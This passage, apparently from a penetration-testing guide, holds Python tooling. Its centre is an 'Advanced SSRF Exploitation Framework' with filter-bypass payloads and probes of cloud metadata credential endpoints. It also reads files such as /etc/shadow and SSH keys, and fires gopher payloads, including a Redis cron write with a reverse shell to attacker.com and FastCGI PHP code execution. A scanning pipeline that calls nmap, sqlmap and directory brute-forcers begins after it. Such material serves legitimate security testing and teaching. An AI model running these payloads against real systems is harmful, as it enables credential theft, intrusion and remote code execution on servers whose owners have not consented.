                'Train staff on log analysis and incident response',
                'Conduct regular log audits and penetration testing'
            ]
        })
        
        return recommendations

# Usage
tester = LoggingMonitoringTester(
    "http://target.com",
    auth_token="your_auth_token_here"
)

report = tester.run_comprehensive_test()

print(f"\n{'='*60}")
print("LOGGING & MONITORING SECURITY ASSESSMENT")
print(f"{'='*60}")
print(f"Target: {report['target']}")
print(f"Scan Date: {report['scan_date']}")
print(f"Total Findings: {report['total_findings']}")

print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    if count > 0:
        print(f"  {severity}: {count}")

print(f"\nFindings by Test Category:")
for test, count in report['findings_by_test'].items():
    print(f"  {test}: {count}")

# Show critical findings
critical_findings = [f for f in report['detailed_findings'] 
                    if f.get('severity') in ['CRITICAL', 'HIGH']]

if critical_findings:
    print(f"\nCRITICAL/HIGH SEVERITY FINDINGS:")
    for finding in critical_findings[:5]:
        print(f"  - [{finding['severity']}] {finding.get('test')}")
        print(f"    {finding.get('evidence', '')[:100]}...")

print(f"\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
    print(f"\n[{rec['priority']}] {rec['category']}:")
    for recommendation in rec['recommendations'][:3]:  # Show first 3
        print(f"  • {recommendation}")

Chapter 10: Server-Side Request Forgery (SSRF) - Advanced Techniques

10.1 Advanced SSRF Exploitation Framework

#!/usr/bin/env python3
"""
Advanced SSRF Exploitation Framework
Includes protocol smuggling, filter bypass, and cloud metadata attacks
"""
import requests
import socket
import re
import json
import urllib.parse
from typing import Dict, List
import ipaddress
import base64

class AdvancedSSRFExploiter:
    def __init__(self, target_url, vulnerable_param):
        self.target_url = target_url
        self.vulnerable_param = vulnerable_param
        self.session = requests.Session()
        self.findings = []
        
        # SSRF payloads and techniques
        self.techniques = {
            'basic_ssrf': self.test_basic_ssrf,
            'protocol_smuggling': self.test_protocol_smuggling,
            'filter_bypass': self.test_filter_bypass,
            'cloud_metadata': self.test_cloud_metadata,
            'internal_services': self.test_internal_services,
            'file_scheme': self.test_file_scheme,
            'dns_rebinding': self.test_dns_rebinding,
            'gopher_protocol': self.test_gopher_protocol
        }
    
    def test_basic_ssrf(self):
        """Test basic SSRF vulnerabilities"""
        findings = []
        
        # Basic internal IPs
        internal_targets = [
            'http://127.0.0.1',
            'http://localhost',
            'http://0.0.0.0',
            'http://[::1]',  # IPv6 localhost
            'http://127.0.0.1:80',
            'http://127.0.0.1:443',
            'http://127.0.0.1:22',
            'http://127.0.0.1:3306',
            'http://127.0.0.1:5432',
            'http://127.0.0.1:6379',
            'http://127.0.0.1:27017',
        ]
        
        for target in internal_targets:
            test_url = self.build_test_url(target)
            response = self.make_request(test_url)
            
            if self.is_ssrf_successful(response, target):
                findings.append({
                    'technique': 'basic_ssrf',
                    'target': target,
                    'status_code': response.status_code,
                    'response_length': len(response.text),
                    'evidence': f'Successful SSRF to {target}'
                })
        
        return findings
    
    def test_protocol_smuggling(self):
        """Test protocol smuggling techniques"""
        findings = []
        
        # Protocol smuggling payloads
        smuggling_payloads = [
            # URL encoding
            'http://127.0.0.1%0d%0aHeader: injected',
            'http://127.0.0.1%0d%0a%0d%0aGET%20/test%20HTTP/1.1',
            
            # New line injection
            'http://127.0.0.1\nHeader: injected',
            'http://127.0.0.1\r\nGET /test HTTP/1.1\r\nHost: 127.0.0.1',
            
            # Space smuggling
            'http://127.0.0.1 :80',
            'http://127.0.0.1 :443',
            
            # Tab smuggling
            'http://127.0.0.1\t:80',
            'http://127.0.0.1\t@evil.com',
        ]
        
        for payload in smuggling_payloads:
            test_url = self.build_test_url(payload)
            response = self.make_request(test_url)
            
            # Check for protocol smuggling indicators
            if self.check_protocol_smuggling(response):
                findings.append({
                    'technique': 'protocol_smuggling',
                    'payload': payload,
                    'status_code': response.status_code,
                    'evidence': f'Protocol smuggling possible: {payload[:50]}...'
                })
        
        return findings
    
    def test_filter_bypass(self):
        """Test SSRF filter bypass techniques"""
        findings = []
        
        bypass_payloads = [
            # Decimal IP
            ('http://2130706433', '127.0.0.1'),  # 127.0.0.1 in decimal
            ('http://3232235521', '192.168.1.1'),  # 192.168.1.1 in decimal
            ('http://16843009', '1.1.1.1'),  # 1.1.1.1 in decimal
            
            # Octal IP
            ('http://0177.0.0.1', '127.0.0.1'),  # 127 in octal
            ('http://0177.0.0.01', '127.0.0.1'),
            ('http://0x7f.0.0.1', '127.0.0.1'),  # 127 in hex
            
            # Hex IP
            ('http://0x7f000001', '127.0.0.1'),  # Hex of 2130706433
            ('http://0xc0a80001', '192.168.0.1'),
            
            # Dotted hex
            ('http://0x7f.0x00.0x00.0x01', '127.0.0.1'),
            ('http://0x7F.0x00.0x00.0x01', '127.0.0.1'),
            
            # IPv6 localhost
            ('http://[::]', 'IPv6 localhost'),
            ('http://[::ffff:127.0.0.1]', 'IPv4-mapped IPv6'),
            
            # Domain tricks
            ('http://127.0.0.1.nip.io', 'DNS rebinding'),
            ('http://127.0.0.1.xip.io', 'DNS rebinding'),
            ('http://localtest.me', 'Resolves to 127.0.0.1'),
            ('http://localhost.localdomain', 'Alternative localhost'),
            
            # URL encoding bypass
            ('http://127.0.0.1%00', 'Null byte'),
            ('http://127.0.0.1%23', 'Hash'),
            ('http://127.0.0.1%3f', 'Question mark'),
            
            # Case variation
            ('http://LOCALHOST', 'Uppercase'),
            ('http://LocalHost', 'Mixed case'),
            ('http://LoCalHoSt', 'Random case'),
            
            # Whitespace
            ('http://127.0.0.1 ', 'Trailing space'),
            ('  http://127.0.0.1', 'Leading space'),
            ('http://127.0.0.1\t', 'Tab'),
            
            # Special characters
            ('http://127.1', 'Shortened IP'),  # 127.0.0.1
            ('http://127.0.1', 'Alternative'),
            ('http://0', '0.0.0.0'),
        ]
        
        for payload, description in bypass_payloads:
            test_url = self.build_test_url(payload)
            response = self.make_request(test_url)
            
            if self.is_ssrf_successful(response, description):
                findings.append({
                    'technique': 'filter_bypass',
                    'payload': payload,
                    'description': description,
                    'status_code': response.status_code,
                    'evidence': f'Filter bypass successful: {description}'
                })
        
        return findings
    
    def test_cloud_metadata(self):
        """Test cloud metadata service access"""
        findings = []
        
        cloud_metadata_endpoints = [
            # AWS EC2 Metadata
            ('http://169.254.169.254/latest/meta-data/', 'AWS EC2 Metadata'),
            ('http://169.254.169.254/latest/user-data/', 'AWS User Data'),
            ('http://169.254.169.254/latest/meta-data/iam/security-credentials/', 'AWS IAM Credentials'),
            ('http://169.254.169.254/latest/dynamic/instance-identity/document', 'AWS Instance Identity'),
            
            # Google Cloud Metadata
            ('http://metadata.google.internal/computeMetadata/v1/', 'GCP Metadata'),
            ('http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token', 'GCP Service Account Token'),
            ('http://metadata.google.internal/computeMetadata/v1/project/project-id', 'GCP Project ID'),
            
            # Azure Metadata
            ('http://169.254.169.254/metadata/instance?api-version=2021-02-01', 'Azure Metadata'),
            ('http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01', 'Azure Managed Identity Token'),
            
            # Alibaba Cloud
            ('http://100.100.100.200/latest/meta-data/', 'Alibaba Cloud Metadata'),
            
            # DigitalOcean
            ('http://169.254.169.254/metadata/v1.json', 'DigitalOcean Metadata'),
            
            # Oracle Cloud
            ('http://169.254.169.254/opc/v1/instance/', 'Oracle Cloud Metadata'),
            
            # Kubernetes
            ('http://kubernetes.default.svc', 'Kubernetes API'),
            ('http://kubernetes.default.svc/api/v1/namespaces/default/secrets', 'Kubernetes Secrets'),
        ]
        
        for endpoint, description in cloud_metadata_endpoints:
            test_url = self.build_test_url(endpoint)
            response = self.make_request(test_url)
            
            if response.status_code == 200:
                # Check for metadata indicators
                if self.is_cloud_metadata(response.text, description):
                    findings.append({
                        'technique': 'cloud_metadata',
                        'endpoint': endpoint,
                        'description': description,
                        'status_code': response.status_code,
                        'response_preview': response.text[:200],
                        'evidence': f'Cloud metadata accessible: {description}'
                    })
        
        return findings
    
    def test_internal_services(self):
        """Test access to internal services"""
        findings = []
        
        # Common internal services and ports
        internal_services = [
            # Web servers
            ('http://127.0.0.1:80', 'Internal HTTP'),
            ('http://127.0.0.1:443', 'Internal HTTPS'),
            ('http://127.0.0.1:8080', 'Internal Alt HTTP'),
            ('http://127.0.0.1:8443', 'Internal Alt HTTPS'),
            
            # Databases
            ('http://127.0.0.1:3306', 'MySQL'),
            ('http://127.0.0.1:5432', 'PostgreSQL'),
            ('http://127.0.0.1:27017', 'MongoDB'),
            ('http://127.0.0.1:6379', 'Redis'),
            ('http://127.0.0.1:9200', 'Elasticsearch'),
            ('http://127.0.0.1:5984', 'CouchDB'),
            
            # Caching
            ('http://127.0.0.1:11211', 'Memcached'),
            
            # Message queues
            ('http://127.0.0.1:5672', 'RabbitMQ'),
            ('http://127.0.0.1:61616', 'ActiveMQ'),
            
            # Monitoring
            ('http://127.0.0.1:9090', 'Prometheus'),
            ('http://127.0.0.1:3000', 'Grafana'),
            
            # Container/Orchestration
            ('http://127.0.0.1:2375', 'Docker'),
            ('http://127.0.0.1:2376', 'Docker TLS'),
            ('http://127.0.0.1:10250', 'Kubelet'),
            
            # Other services
            ('http://127.0.0.1:25', 'SMTP'),
            ('http://127.0.0.1:389', 'LDAP'),
            ('http://127.0.0.1:636', 'LDAPS'),
        ]
        
        for service, description in internal_services:
            test_url = self.build_test_url(service)
            response = self.make_request(test_url, timeout=3)
            
            # Different services give different responses
            if response.status_code != 0:  # Not a timeout
                findings.append({
                    'technique': 'internal_services',
                    'service': description,
                    'endpoint': service,
                    'status_code': response.status_code,
                    'response_time': response.elapsed.total_seconds(),
                    'evidence': f'Internal service {description} responded'
                })
        
        return findings
    
    def test_file_scheme(self):
        """Test file:// scheme for local file read"""
        findings = []
        
        file_payloads = [
            # Linux files
            ('file:///etc/passwd', 'Linux users'),
            ('file:///etc/shadow', 'Linux passwords'),
            ('file:///etc/hosts', 'Hosts file'),
            ('file:///etc/issue', 'Linux version'),
            ('file:///proc/self/environ', 'Process environment'),
            ('file:///proc/version', 'Kernel version'),
            
            # Application files
            ('file:///var/www/html/index.php', 'Web root'),
            ('file:///etc/apache2/apache2.conf', 'Apache config'),
            ('file:///etc/nginx/nginx.conf', 'Nginx config'),
            ('file:///.env', 'Environment file'),
            ('file:///app/config.json', 'App config'),
            
            # Windows files
            ('file:///C:/Windows/System32/drivers/etc/hosts', 'Windows hosts'),
            ('file:///C:/Windows/win.ini', 'Windows config'),
            
            # SSH keys
            ('file:///home/user/.ssh/id_rsa', 'SSH private key'),
            ('file:///root/.ssh/id_rsa', 'Root SSH key'),
            
            # Logs
            ('file:///var/log/auth.log', 'Auth logs'),
            ('file:///var/log/apache2/access.log', 'Apache logs'),
        ]
        
        for file_path, description in file_payloads:
            test_url = self.build_test_url(file_path)
            response = self.make_request(test_url)
            
            if response.status_code == 200:
                # Check for file content indicators
                if self.is_file_content(response.text, description):
                    findings.append({
                        'technique': 'file_scheme',
                        'file': file_path,
                        'description': description,
                        'status_code': response.status_code,
                        'content_preview': response.text[:200],
                        'evidence': f'File read successful: {description}'
                    })
        
        return findings
    
    def test_dns_rebinding(self):
        """Test DNS rebinding attack"""
        findings = []
        
        # DNS rebinding services
        rebinding_services = [
            ('http://rbndr.us:53/', 'Rapid7 DNS rebinding'),
            ('http://pingb.in/', 'Pingbin'),
        ]
        
        for service, description in rebinding_services:
            # This would require setting up DNS rebinding
            # For demonstration, we'll note the technique
            findings.append({
                'technique': 'dns_rebinding',
                'service': service,
                'description': description,
                'evidence': f'DNS rebinding possible via {description} - requires setup'
            })
        
        return findings
    
    def test_gopher_protocol(self):
        """Test Gopher protocol for SSRF"""
        findings = []
        
        # Gopher payloads for different services
        gopher_payloads = [
            # Redis
            ('gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/attacker.com/4444 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a', 'Redis RCE'),
            
            # MySQL
            ('gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c', 'MySQL Auth'),
            
            # FastCGI
            ('gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%10%00%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH56%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Asafe_mode%20%3D%20Off%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00%2E%04%00%3C%3Fphp%20system%28%27id%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00', 'FastCGI RCE'),
        ]
        
        for payload, description in gopher_payloads:
            test_url = self.build_test_url(payload)
            response = self.make_request(test_url)
            
            if response.status_code != 400 and response.status_code != 0:
                findings.append({
                    'technique': 'gopher_protocol',
                    'description': description,
                    'status_code': response.status_code,
                    'evidence': f'Gopher protocol可能可用: {description}'
                })
        
        return findings
    
    def build_test_url(self, payload):
        """Build test URL with SSRF payload"""
        # URL encode the payload
        encoded_payload = urllib.parse.quote(payload, safe='')
        
        # Construct the test URL
        if '?' in self.target_url:
            # URL already has parameters
            test_url = f"{self.target_url}&{self.vulnerable_param}={encoded_payload}"
        else:
            test_url = f"{self.target_url}?{self.vulnerable_param}={encoded_payload}"
        
        return test_url
    
    def make_request(self, url, timeout=10):
        """Make HTTP request and handle errors"""
        try:
            response = self.session.get(url, timeout=timeout)
            return response
        except requests.exceptions.Timeout:
            return type('obj', (object,), {'status_code': 0, 'text': '', 'elapsed': type('obj', (object,), {'total_seconds': lambda: timeout})()})()
        except requests.exceptions.ConnectionError:
            return type('obj', (object,), {'status_code': 0, 'text': '', 'elapsed': type('obj', (object,), {'total_seconds': lambda: 0})()})()
        except Exception as e:
            return type('obj', (object,), {'status_code': 0, 'text': str(e), 'elapsed': type('obj', (object,), {'total_seconds': lambda: 0})()})()
    
    def is_ssrf_successful(self, response, target):
        """Determine if SSRF was successful"""
        if response.status_code == 0:
            return False
        
        # Check for common indicators
        indicators = [
            # Status codes
            response.status_code in [200, 201, 202, 203, 204, 205, 206],
            
            # Content indicators
            'root:' in response.text if 'passwd' in target else False,
            'html' in response.text.lower(),
            'http' in response.text.lower(),
            '<!DOCTYPE' in response.text,
            
            # Length indicators
            len(response.text) > 100,  # Meaningful response
            
            # Time indicators (for blind SSRF)
            response.elapsed.total_seconds() > 2,
        ]
        
        return any(indicators)
    
    def check_protocol_smuggling(self, response):
        """Check for protocol smuggling indicators"""
        smuggling_indicators = [
            '400 Bad Request',
            'Invalid HTTP',
            'malformed',
            'invalid request',
            'protocol violation',
        ]
        
        return any(indicator in response.text for indicator in smuggling_indicators)
    
    def is_cloud_metadata(self, response_text, description):
        """Check if response contains cloud metadata"""
        metadata_indicators = {
            'AWS': ['instance-id', 'ami-id', 'instance-type', 'availability-zone'],
            'GCP': ['google', 'computeMetadata', 'project-id'],
            'Azure': ['azure', 'subscriptionId', 'resourceGroupName'],
            'Kubernetes': ['kubernetes', 'pod', 'namespace', 'serviceaccount'],
        }
        
        for provider, indicators in metadata_indicators.items():
            if provider.lower() in description.lower():
                return any(indicator in response_text.lower() for indicator in indicators)
        
        return False
    
    def is_file_content(self, response_text, description):
        """Check if response contains file content"""
        file_indicators = {
            'Linux users': ['root:', 'daemon:', 'bin:'],
            'Linux passwords': ['root:', 'shadow', 'encrypted'],
            'Hosts file': ['localhost', '127.0.0.1'],
            'Environment': ['PATH=', 'HOME=', 'USER='],
            'SSH private key': ['-----BEGIN RSA PRIVATE KEY-----', '-----BEGIN PRIVATE KEY-----'],
            'App config': ['database', 'password', 'secret', 'key'],
        }
        
        for file_type, indicators in file_indicators.items():
            if file_type.lower() in description.lower():
                return any(indicator in response_text for indicator in indicators)
        
        return len(response_text) > 50 and not '<html' in response_text.lower()
    
    def run_all_tests(self):
        """Run all SSRF tests"""
        print(f"[*] Starting advanced SSRF testing on {self.target_url}")
        
        all_findings = []
        
        for technique_name, technique_func in self.techniques.items():
            print(f"[*] Testing {technique_name}...")
            try:
                findings = technique_func()
                all_findings.extend(findings)
                print(f"[+] {technique_name}: {len(findings)} findings")
            except Exception as e:
                print(f"[-] {technique_name} failed: {e}")
        
        # Generate report
        report = self.generate_report(all_findings)
        return report
    
    def generate_report(self, findings):
        """Generate SSRF test report"""
        report = {
            'target': self.target_url,
            'vulnerable_parameter': self.vulnerable_param,
            'total_findings': len(findings),
            'findings_by_technique': {},
            'findings_by_severity': {},
            'detailed_findings': findings,
            'recommendations': self.generate_recommendations(findings)
        }
        
        # Categorize findings
        for finding in findings:
            # By technique
            technique = finding.get('technique', 'unknown')
            if technique not in report['findings_by_technique']:
                report['findings_by_technique'][technique] = 0
            report['findings_by_technique'][technique] += 1
            
            # By severity
            severity = self.assess_severity(finding)
            if severity not in report['findings_by_severity']:
                report['findings_by_severity'][severity] = 0
            report['findings_by_severity'][severity] += 1
            finding['severity'] = severity
        
        return report
    
    def assess_severity(self, finding):
        """Assess severity of SSRF finding"""
        technique = finding.get('technique', '')
        evidence = finding.get('evidence', '').lower()
        
        if 'cloud_metadata' in technique and 'credential' in evidence:
            return 'CRITICAL'
        elif 'file_scheme' in technique and ('shadow' in evidence or 'id_rsa' in evidence):
            return 'CRITICAL'
        elif 'internal_services' in technique and ('3306' in evidence or '5432' in evidence):
            return 'HIGH'
        elif 'gopher_protocol' in technique:
            return 'HIGH'
        elif 'basic_ssrf' in technique and '127.0.0.1' in evidence:
            return 'MEDIUM'
        else:
            return 'LOW'
    
    def generate_recommendations(self, findings):
        """Generate SSRF prevention recommendations"""
        recommendations = []
        
        if any('basic_ssrf' in f.get('technique', '') for f in findings):
            recommendations.append({
                'category': 'Input Validation',
                'priority': 'HIGH',
                'recommendations': [
                    'Implement allow-list for URLs instead of block-list',
                    'Validate and sanitize all user-supplied URLs',
                    'Use proper URL parsing libraries (not regex)',
                    'Reject URLs with private/reserved IP addresses',
                    'Block loopback and localhost addresses'
                ]
            })
        
        if any('filter_bypass' in f.get('technique', '') for f in findings):
            recommendations.append({
                'category': 'Filter Bypass Protection',
                'priority': 'HIGH',
                'recommendations': [
                    'Normalize URLs before validation (lowercase, decode)',
                    'Resolve DNS and validate IP addresses',
                    'Check for IP address variations (decimal, hex, octal)',
                    'Implement multiple validation layers',
                    'Use network-layer filtering in addition to application-layer'
                ]
            })
        
        if any('cloud_metadata' in f.get('technique', '') for f in findings):
            recommendations.append({
                'category': 'Cloud Metadata Protection',
                'priority': 'CRITICAL',
                'recommendations': [
                    'Block access to cloud metadata endpoints (169.254.169.254, etc.)',
                    'Use instance metadata service v2 (IMDSv2) for AWS',
                    'Restrict metadata service with firewall rules',
                    'Use service accounts with minimum necessary permissions',
                    'Regularly rotate credentials and tokens'
                ]
            })
        
        if any('file_scheme' in f.get('technique', '') for f in findings):
            recommendations.append({
                'category': 'File Scheme Protection',
                'priority': 'HIGH',
                'recommendations': [
                    'Disable file:// protocol in URL fetching',
                    'Use secure URL fetching libraries with protocol restrictions',
                    'Implement content-type validation',
                    'Sandbox URL fetching operations',
                    'Monitor for local file read attempts'
                ]
            })
        
        # General recommendations
        recommendations.append({
            'category': 'General SSRF Protection',
            'priority': 'MEDIUM',
            'recommendations': [
                'Implement outbound firewall rules to restrict internal access',
                'Use network segmentation to isolate sensitive services',
                'Monitor for SSRF attempts in logs',
                'Conduct regular penetration testing for SSRF',
                'Educate developers about SSRF risks and prevention'
            ]
        })
        
        return recommendations

# Usage
exploiter = AdvancedSSRFExploiter(
    "http://target.com/fetch",
    "url"
)

report = exploiter.run_all_tests()

print(f"\n{'='*60}")
print("ADVANCED SSRF TESTING REPORT")
print(f"{'='*60}")
print(f"Target: {report['target']}")
print(f"Vulnerable Parameter: {report['vulnerable_parameter']}")
print(f"Total Findings: {report['total_findings']}")

print(f"\nFindings by Technique:")
for technique, count in report['findings_by_technique'].items():
    print(f"  {technique}: {count}")

print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    print(f"  {severity}: {count}")

# Show critical findings
critical_findings = [f for f in report['detailed_findings'] 
                    if f.get('severity') in ['CRITICAL', 'HIGH']]

if critical_findings:
    print(f"\nCRITICAL/HIGH SEVERITY FINDINGS:")
    for finding in critical_findings[:3]:
        print(f"  - [{finding['severity']}] {finding.get('technique')}")
        print(f"    {finding.get('evidence', '')[:100]}...")

print(f"\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
    print(f"\n[{rec['priority']}] {rec['category']}:")
    for recommendation in rec['recommendations'][:3]:
        print(f"  • {recommendation}")

Chapter 11: Comprehensive Security Testing Automation

11.1 Integrated Security Testing Pipeline

#!/usr/bin/env python3
"""
Integrated Security Testing Pipeline
Combines multiple security testing tools and techniques
"""
import subprocess
import json
import yaml
import xml.etree.ElementTree as ET
from pathlib import Path
from datetime import datetime
import concurrent.futures
import time
import requests
import sys

class SecurityTestingPipeline:
    def __init__(self, target, config_file=None):
        self.target = target
        self.config = self.load_config(config_file)
        self.results = {}
        self.report = {}
        
    def load_config(self, config_file):
        """Load pipeline configuration"""
        default_config = {
            'scan_types': {
                'reconnaissance': True,
                'vulnerability_scanning': True,
                'authentication_testing': True,
                'api_testing': True,
                'business_logic': True,
                'reporting': True
            },
            'tools': {
                'nmap': {
                    'enabled': True,
                    'ports': '1-1000',
                    'scripts': ['vuln', 'safe', 'discovery']
                },
                'nikto': {
                    'enabled': True,
                    'timeout': 300
                },
                'sqlmap': {
                    'enabled': True,
                    'risk': 1,
                    'level': 1
                },
                'zap': {
                    'enabled': True,
                    'mode': 'full'
                },
                'custom_tests': {
                    'enabled': True
                }
            },
            'reporting': {
                'format': ['html', 'json', 'pdf'],
                'output_dir': './reports'
            }
        }
        
        if config_file:
            with open(config_file) as f:
                user_config = yaml.safe_load(f)
                # Merge with default config
                default_config.update(user_config)
        
        return default_config
    
    def run_pipeline(self):
        """Run the complete security testing pipeline"""
        print(f"[*] Starting security testing pipeline for {self.target}")
        print(f"[*] Start time: {datetime.now()}")
        
        pipeline_steps = [
            ('Initialization', self.initialize_pipeline),
            ('Reconnaissance', self.run_reconnaissance),
            ('Vulnerability Scanning', self.run_vulnerability_scanning),
            ('Authentication Testing', self.run_authentication_testing),
            ('API Testing', self.run_api_testing),
            ('Business Logic Testing', self.run_business_logic_tests),
            ('Custom Tests', self.run_custom_tests),
            ('Reporting', self.generate_report)
        ]
        
        for step_name, step_func in pipeline_steps:
            if self.should_run_step(step_name):
                print(f"\n[*] Running step: {step_name}")
                try:
                    result = step_func()
                    self.results[step_name] = result
                    print(f"[+] {step_name} completed successfully")
                except Exception as e:
                    print(f"[-] {step_name} failed: {e}")
                    self.results[step_name] = {'error': str(e)}
        
        print(f"\n[*] Pipeline completed at {datetime.now()}")
        return self.results
    
    def should_run_step(self, step_name):
        """Check if step should run based on configuration"""
        step_mapping = {
            'Reconnaissance': 'reconnaissance',
            'Vulnerability Scanning': 'vulnerability_scanning',
            'Authentication Testing': 'authentication_testing',
            'API Testing': 'api_testing',
            'Business Logic Testing': 'business_logic',
            'Reporting': 'reporting'
        }
        
        if step_name in step_mapping:
            return self.config['scan_types'].get(step_mapping[step_name], True)
        
        return True
    
    def initialize_pipeline(self):
        """Initialize the testing pipeline"""
        # Create output directory
        output_dir = Path(self.config['reporting']['output_dir'])
        output_dir.mkdir(parents=True, exist_ok=True)
        
        # Create session file
        session_data = {
            'target': self.target,
            'start_time': datetime.now().isoformat(),
            'config': self.config
        }
        
        session_file = output_dir / 'session.json'
        with open(session_file, 'w') as f:
            json.dump(session_data, f, indent=2)
        
        return {'status': 'initialized', 'session_file': str(session_file)}
    
    def run_reconnaissance(self):
        """Run reconnaissance phase"""
        recon_results = {}
        
        # 1. Nmap scan
        if self.config['tools']['nmap']['enabled']:
            print("[*] Running Nmap scan...")
            nmap_result = self.run_nmap_scan()
            recon_results['nmap'] = nmap_result
        
        # 2. Directory enumeration
        print("[*] Running directory enumeration...")
        dir_result = self.run_directory_enumeration()
        recon_results['directory_enumeration'] = dir_result
        
        # 3. Subdomain enumeration
        print("[*] Running subdomain enumeration...")
        subdomain_result = self.run_subdomain_enumeration()
        recon_results['subdomain_enumeration'] = subdomain_result
        
        # 4. Technology detection
        print("[*] Detecting technologies...")
        tech_result = self.detect_technologies()
        recon_results['technology_detection'] = tech_result
        
        return recon_results
    
    def run_nmap_scan(self):
        """Run Nmap scan"""
        ports = self.config['tools']['nmap']['ports']
        scripts = self.config['tools']['nmap']['scripts']
        
        cmd = ['nmap', '-sV', '-sC', '-p', ports, '-oA', 'nmap_scan', self.target]
        
        # Add scripts if specified
        if scripts:
            for script in scripts:
                cmd.extend(['--script', script])
        
        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
            
            # Parse Nmap output
            parsed_results = self.parse_nmap_output(result.stdout)
            
            return {
                'command': ' '.join(cmd),
                'returncode': result.returncode,
                'stdout': result.stdout[:1000],
                'parsed_results': parsed_results
            }
        except subprocess.TimeoutExpired:
            return {'error': 'Nmap scan timed out after 10 minutes'}
        except Exception as e:
            return {'error': str(e)}
    
    def parse_nmap_output(self, nmap_output):
        """Parse Nmap output into structured data"""
        parsed = {
            'open_ports': [],
            'services': [],
            'vulnerabilities': []
        }
        
        # Simple parsing - in reality, use nmap parser library
        lines = nmap_output.split('\n')
        
        for line in lines:
            if '/tcp' in line or '/udp' in line:
                # Port line: 80/tcp open http
                parts = line.split()
                if len(parts) >= 3:
                    port_proto = parts[0]
                    state = parts[1]
                    service = parts[2] if len(parts) > 2 else 'unknown'
                    
                    parsed['open_ports'].append({
                        'port': port_proto,
                        'state': state,
                        'service': service
                    })
        
        return parsed
    
    def run_directory_enumeration(self):
        """Run directory enumeration"""
        tools = ['gobuster', 'ffuf', 'dirb']
        
        dir_results = {}
        
        for tool in tools:
            try:
                if tool == 'gobuster':
                    cmd = ['gobuster', 'dir', '-u', self.target, '-w', 
                          '/usr/share/wordlists/dirb/common.txt', '-t', '50']
                    result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
                    dir_results['gobuster'] = self.parse_gobuster_output(result.stdout)
                
                elif tool == 'ffuf':
                    cmd = ['ffuf', '-u', f'{self.target}/FUZZ', '-w',
                          '/usr/share/wordlists/dirb/common.txt', '-t', '50']
                    result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
                    dir_results['ffuf'] = self.parse_ffuf_output(result.stdout)
            
            except Exception as e:
                dir_results[tool] = {'error': str(e)}
        
        return dir_results
    
    def run_subdomain_enumeration(self):
        """Run subdomain enumeration"""
        # Extract domain from target
        from urllib.parse import urlparse
        parsed = urlparse(self.target)
        domain = parsed.netloc or parsed.path
        
        # Remove port if present
        if ':' in domain:
            domain = domain.split(':')[0]
        
        subdomain_results = {}
        
        try:
            # Use subfinder if available
            cmd = ['subfinder', '-d', domain, '-silent']
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
            subdomains = result.stdout.strip().split('\n')
            
            subdomain_results['subfinder'] = {
                'domain': domain,
                'subdomains_found': len(subdomains),
                'subdomains': subdomains[:10]  # First 10
            }
        
        except Exception as e:
            subdomain_results['error'] = str(e)
        
        return subdomain_results
    
    def detect_technologies(self):
        """Detect web technologies"""
        tech_results = {}
        
        try:
            # Use Wappalyzer or WhatWeb
            cmd = ['whatweb', '-a', '3', self.target]
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
            
            # Parse WhatWeb output
            tech_results['whatweb'] = self.parse_whatweb_output(result.stdout)
        
        except Exception as e:
            tech_results['error'] = str(e)
        
        return tech_results
    
    def run_vulnerability_scanning(self):
        """Run vulnerability scanning"""
        vuln_results = {}
        
        # 1. Nikto scan
        if self.config['tools']['nikto']['enabled']:
            print("[*] Running Nikto scan...")
            nikto_result = self.run_nikto_scan()
            vuln_results['nikto'] = nikto_result
        
        # 2. SQLMap scan (if SQLi suspected)
        if self.config['tools']['sqlmap']['enabled']:
            print("[*] Running SQLMap scan...")
            sqlmap_result = self.run_sqlmap_scan()
            vuln_results['sqlmap'] = sqlmap_result
        
        # 3. OWASP ZAP scan
        if self.config['tools']['zap']['enabled']:
            print("[*] Running OWASP ZAP scan...")
            zap_result = self.run_zap_scan()
            vuln_results['zap'] = zap_result
        
        return vuln_results
    
    def run_nikto_scan(self):
